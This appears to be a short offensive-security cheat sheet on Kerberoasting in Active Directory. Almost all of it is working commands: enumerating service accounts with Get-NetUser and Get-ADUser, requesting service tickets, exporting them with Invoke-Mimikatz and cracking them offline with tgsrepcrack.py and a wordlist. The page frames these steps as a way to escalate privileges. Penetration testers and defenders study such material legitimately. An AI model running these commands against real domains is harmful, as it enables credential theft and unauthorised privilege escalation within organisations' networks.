KERBEROASTING
Kerberoasting attack can be mainly used for vertical and horizontal privilege escalation
Kerberoasting the services which uses Machine Account is simply a waste of time, because machine account uses complex passwords which cannot be found from its hash value
Kerberoasting is widely targeted on services which are using User Accounts
Enumerating services which uses User Accounts on current domain
Get-NetUser -SPN
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Kerberoasting a user account of a service, gives you the same privilege as the user account
Requesting a new TGS to the service from an user account
Request-SPNTicket -SPN <SPN FQDN>
Add-Type -AssemblyNAme System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList <SPN FQDN>
Verifying tickets using klist
Exporting the tickets to crack the hash
Invoke-Mimikatz -Command '"kerberos::list /export"'
Cracking this TGS ticket using passwords list (Will not be successful everytime, depends on the password list)
python .\tgsrepcrack.py <WORDLIST> <TOKEN FILE>
CRACK
Last updated